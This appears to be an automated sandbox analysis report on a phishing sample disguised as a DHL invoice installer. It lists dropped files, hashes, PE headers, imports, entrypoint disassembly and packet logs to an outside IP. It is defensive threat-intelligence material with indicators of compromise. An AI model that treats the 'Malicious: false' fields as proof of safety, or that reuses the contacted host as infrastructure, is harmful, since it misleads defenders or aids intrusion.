C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\System.Runtime.Extensions.dll

Download File

Process:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17000
Entropy (8bit):	6.461035345842009
Encrypted:	false
SSDEEP:	384:z58KUByGe9xCEW62XWXNWqla/uPHRN7493LlqR:dpUByGeo0ZluMf
MD5:	B879C937737592612DEA79F330EA70B4
SHA1:	59B3FB0BE047B48CF6F8177F19298F6AD850B390
SHA-256:	1B9B3244EF33ADC14A6B2AF0C58489DF0238CF1CCF6649E7648845D8AF51ED0E
SHA-512:	5A02E3D80C10A4DD7BABDBBDBC1FF11E6C87538C25E14D320445692FDA1C8600E6B278413D17594C7EF9B4399A30A566255EA18A613995BDFFC88289D81D66CD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B............"!..0..............3... ........@.. ..............................e.....`.................................83..S....@..................h$...`.......2..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........ ......................P ....................................... .h45. aZ.J.l..[5...z....2f.6.%........m0:........D..n.=(.n\/.pB...X..c.q.h..O@...G.oV....Xt.....x..G..U...w..Z....c2.>BSJB............v4.0.30319......`...$...#~......l...#Strings............#GUID...........#Blob......................3................................O...............Z.............m.........,.W.........5.............p.....p.....p.....p.....p...E.p...b.p...z.p.....p.................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\Terrestriske.bmp

Download File

Process:	C:\Users\user\Desktop\DHL-INVOICE-MBV.exe
File Type:	PC bitmap, Windows 3.x format, 72 x 565 x 24, image size 122040, cbSize 122094, bits offset 54
Category:	dropped
Size (bytes):	122094
Entropy (8bit):	6.959876660813091
Encrypted:	false
SSDEEP:	3072:/82zSO2BrKbWfTNwAGZwcGeXst5HWPk+J5pkv+kd:/8gSfKCm2eXiQk+PpkWu
MD5:	7CE6A47FA2B5963410BE9B8B78E619B2
SHA1:	52BF427506E7E203789201F965F585E2E77C265A
SHA-256:	C6BCAA9FF0CF0C686560C9CAF6EA33B46766BDC6C2ACBB9A81988CF974A7562E
SHA-512:	96B24612D50EE4E0F23228FEBDBE4437E72C732A60E7641DFA30864004C8CA8D4AEC21AC46DB7BCABC831BACECB4FAAE71CAC563BF2238D69582A2CCC7433178
Malicious:	false
Preview:	BM........6...(...H...5.........................................@1.=1.....>.q(...r.......S.Y..HJ.WI;..g..@..u.@..k...!<.>(.....[.T...H.....C.i......\~.K..w._...DN...S......D=}......-.yer.@t.>...>5..y@,....Kt..N.E....`.6/...`.>...>..5z.6.......$;....b..]Wk..{..E....^........S..un..lZ..h.P...X.h.I....Z..^..7....7..?...v...TY.m`.6.w..+J..../.....#..~J`4.q.....Y9..`..N0..).f...A...(\|....._O.P. !J..a.3h.2A..%}..zPe.....{..\.WB.up.../.[..)/ob..i.f.....v..@...M....;..s.e>....+`....0..j.\|......M.7..../........tH.yXY.^u.i.....".P".^.^:..FH..y>\|.2.sd...Q...2..o.;..l.g.....2..S`..:x..+.u;.....4i.t...@I.\..2.h+.....7..g...hn ..sv..'."9....Qy..[.u...6...R..d....bJ.!.....u~9.....x`L...k.?i..Y.S......[.>j.k..lO..9...U...B...!...p..,U.Y.>.f..yPo..C..FeF...9.RIq.Mo .fg..7^.Gq0....v..N?....c..'B-.s5....zn..(8...j.@Z..-..Xp..@_X.'v.3.d.fG~..h.0...GU.U).e.}.*.A..E.}..1.(..L...q:.1...m..z=1.Aq...+.ke.y/Q..2.o...@..Z...zk....@#..%O.'F.@~..Pb..F..L.Xv...H..."Q.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.885156406313145
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL-INVOICE-MBV.exe
File size:	277843
MD5:	97516ce29dc27c8eeb9f7b38d4611577
SHA1:	0e7a754c301f2b4043e40d2fd7076dd776103e12
SHA256:	54ed2a73c16c51669b59fb94d88f8e488ada1a53138559dd6c3c00c590bd3a5d
SHA512:	6f01af49d1497f31c2ee1188b703accce6816dd23a9593616d5dd9b3db31eb123c6c5d8b3aeac029f24bd5dffbb7c293246776e80998d0a3d86b5423846a84c2
SSDEEP:	6144:ARlWokQ9F3RBYqJFntlY0c1YXwWNVIZYC3x+u8Gi7jeA:I39TBYqJz8mwOuJhPlmeA
TLSH:	AF44120876F4D833DDB2CF33BE2A56939FA59005269476376740DB9D3AA3431CA8E346
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....

File Icon


Icon Hash:	f8b0a2b8b090e0c0

Static PE Info

General

Entrypoint:	0x403359
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A20Ch], eax
je 00007F5FD8AFF873h
push ebx
call 00007F5FD8B02B25h
cmp eax, ebx
je 00007F5FD8AFF869h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F5FD8B02A9Fh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F5FD8AFF84Ch
push 0000000Ah
call 00007F5FD8B02AF8h
push 00000008h
call 00007F5FD8B02AF1h
push 00000006h
mov dword ptr [0042A204h], eax
call 00007F5FD8B02AE5h
cmp eax, ebx
je 00007F5FD8AFF871h
push 0000001Eh
call eax
test eax, eax
je 00007F5FD8AFF869h
or byte ptr [0042A20Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A2D8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216A8h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4b000	0x4498	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x62a5	0x6400	False	0.658984375	data	6.431390019180314	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20318	0x600	False	0.4928385416666667	data	3.90464114821524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x20000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4b000	0x4498	0x4600	False	0.49324776785714286	data	5.407431883634609	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x4b250	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States
RT_ICON	0x4d7f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States
RT_ICON	0x4e8a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States
RT_DIALOG	0x4ed08	0x100	data	English	United States
RT_DIALOG	0x4ee08	0x11c	data	English	United States
RT_DIALOG	0x4ef28	0xc4	data	English	United States
RT_DIALOG	0x4eff0	0xd2	data	English	United States
RT_DIALOG	0x4f0c8	0x60	data	English	United States
RT_GROUP_ICON	0x4f128	0x30	data	English	United States
RT_MANIFEST	0x4f158	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2022 13:14:19.445544958 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.593673944 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.593914032 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.594552040 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.742682934 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.742778063 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.742844105 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.742909908 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.742969990 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.743009090 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.743030071 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.743093967 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.743094921 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.743094921 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.743146896 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.743155003 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.743197918 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.743217945 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.743242025 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.743278027 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.743340969 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.743449926 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.743449926 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.743524075 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.891688108 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.891779900 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.891844988 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.891901970 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.891906977 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.891966105 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.891969919 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892035007 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892076015 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892076969 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892096043 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892158031 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892216921 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892244101 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892244101 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892277956 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892318964 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892318964 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892379045 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892400980 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892432928 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892467976 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892528057 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892586946 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892591953 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892647028 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892649889 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892713070 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892767906 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892767906 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892813921 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892858982 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892895937 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.892908096 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.892973900 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.893035889 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:19.893039942 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.893098116 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.893218040 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:19.893218040 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041065931 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041105986 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041135073 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041166067 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041193962 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041222095 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041249037 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041266918 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041277885 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041306019 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041333914 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041361094 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041373014 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041388988 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041414022 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041414022 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041416883 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041445971 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041474104 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041501999 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041526079 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041528940 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041526079 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041574001 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041613102 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041621923 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041623116 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041646957 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041670084 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041682959 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041718960 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041719913 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041755915 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041769028 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041793108 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041829109 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041863918 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041873932 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041873932 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041898012 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041933060 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041966915 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.041971922 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.041971922 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042001963 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042020082 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042037010 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042068958 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042068958 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042071104 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042105913 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042139053 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042166948 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042166948 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042172909 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042206049 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042216063 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042241096 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042274952 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042309046 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042313099 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042344093 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.042362928 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042362928 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042460918 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.042510033 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.190496922 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.190571070 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.190628052 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.190656900 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.190680981 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.190733910 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.190783024 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.190853119 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.190913916 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191019058 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191075087 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191080093 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191128969 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191158056 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191214085 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191266060 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191266060 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191437006 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191438913 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191490889 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191545010 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191582918 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191596985 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191629887 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191652060 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191680908 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191704988 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191757917 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191761971 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191761971 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191809893 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191863060 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191869974 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191915035 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191916943 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.191967964 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.191967964 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192015886 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192022085 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192064047 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192075968 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192128897 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192131042 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192131996 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192182064 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192234993 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192239046 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192286968 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192291021 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192336082 CEST	49834	80	192.168.11.20	202.5.16.67
